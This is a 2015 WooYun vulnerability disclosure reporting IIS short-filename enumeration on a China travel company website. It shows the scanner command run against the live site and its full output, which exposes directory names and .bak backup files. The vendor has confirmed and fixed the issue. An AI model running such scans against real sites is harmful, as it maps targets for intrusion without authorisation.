当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116442

漏洞标题:中国国旅某站IIS短目录枚举

相关厂商:中国国旅

漏洞作者: 路人甲

提交时间:2015-05-27 12:06

修复时间:2015-07-16 10:30

公开时间:2015-07-16 10:30

漏洞类型:应用配置错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-27: 细节已通知厂商并且等待厂商处理中
2015-06-01: 厂商已经确认,细节仅向厂商公开
2015-06-11: 细节向核心白帽子及相关领域专家公开
2015-06-21: 细节向普通白帽子公开
2015-07-01: 细节向实习白帽子公开
2015-07-16: 细节向公众公开

简要描述:

233

详细说明:

http://www.sz-cits.cn/

漏洞证明:

root>shortname.py http://www.sz-cits.cn/
[INFO] the server is vulerable, start scanning...
Found /a**** [scan in progress]
Found /c**** [scan in progress]
Found /f**** [scan in progress]
Found /g**** [scan in progress]
Found /i**** [scan in progress]
Found /s**** [scan in progress]
Found /o**** [scan in progress]
Found /u**** [scan in progress]
Found /ch**** [scan in progress]
Found /as**** [scan in progress]
Found /fo**** [scan in progress]
Found /gd**** [scan in progress]
Found /in**** [scan in progress]
Found /sh**** [scan in progress]
Found /on**** [scan in progress]
Found /up**** [scan in progress]
Found /che**** [scan in progress]
Found /asp**** [scan in progress]
Found /foo**** [scan in progress]
Found /gds**** [scan in progress]
Found /ind**** [scan in progress]
Found /sho**** [scan in progress]
Found /onl**** [scan in progress]
Found /upl**** [scan in progress]
Found /chec**** [scan in progress]
Found /aspn**** [scan in progress]
Found /foot**** [scan in progress]
Found /gdsy**** [scan in progress]
Found /inde**** [scan in progress]
Found /show**** [scan in progress]
Found /onli**** [scan in progress]
Found /uplo**** [scan in progress]
Found /check**** [scan in progress]
Found /aspne**** [scan in progress]
Found /foota**** [scan in progress]
Found /gdsys**** [scan in progress]
Found /index**** [scan in progress]
Found /showa**** [scan in progress]
Found /onlin**** [scan in progress]
Found /uploa**** [scan in progress]
Found /checkc**** [scan in progress]
Found /aspnet**** [scan in progress]
Found /footas**** [scan in progress]
Found /gdsys2**** [scan in progress]
Found /indexa**** [scan in progress]
Found /showar**** [scan in progress]
Found /online**** [scan in progress]
Found /upload**** [scan in progress]
Found /checkc*a** [scan in progress]
Found /checkc*p** [scan in progress]
Found /checkc*s** [scan in progress]
Found /aspnet [scan in progress]
Found Dir /aspnet~1 [Done]
Found /footas*a** [scan in progress]
Found /footas*b** [scan in progress]
Found /footas*k** [scan in progress]
Found /indexa*a** [scan in progress]
Found /gdsys2 [scan in progress]
Found Dir /gdsys2~1 [Done]
Found /indexa*b** [scan in progress]
Found /indexa*k** [scan in progress]
Found /showar*a** [scan in progress]
Found /showar*p** [scan in progress]
Found /showar*s** [scan in progress]
Found /online*a** [scan in progress]
Found /online*p** [scan in progress]
Found /online*s** [scan in progress]
Found /upload [scan in progress]
Found Dir /upload~1 [Done]
Found /checkc*as* [scan in progress]
Found /checkc*sp* [scan in progress]
Found /footas*ak* [scan in progress]
Found /footas*ba* [scan in progress]
Found /indexa*ak* [scan in progress]
Found /indexa*ba* [scan in progress]
Found /showar*as* [scan in progress]
Found /showar*sp* [scan in progress]
Found /online*as* [scan in progress]
Found /online*sp* [scan in progress]
Found /checkc*asp [scan in progress]
Found File /checkc~1.asp [Done]
Found /footas*bak [scan in progress]
Found File /footas~1.bak [Done]
Found /indexa*bak [scan in progress]
Found File /indexa~1.bak [Done]
Found /showar*asp [scan in progress]
Found File /showar~1.asp [Done]
Found /online*asp [scan in progress]
Found File /online~1.asp [Done]
----------------------------------------------------------------
Dir: /aspnet~1
Dir: /gdsys2~1
Dir: /upload~1
File: /checkc~1.asp
File: /footas~1.bak
File: /indexa~1.bak
File: /showar~1.asp
File: /online~1.asp
----------------------------------------------------------------
3 Directories, 5 Files found in total

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-06-01 10:28

厂商回复:

非常感谢您的报告,问题已处理,十分感谢您对中国国旅的支持。

最新状态:

暂无


漏洞评价:

评论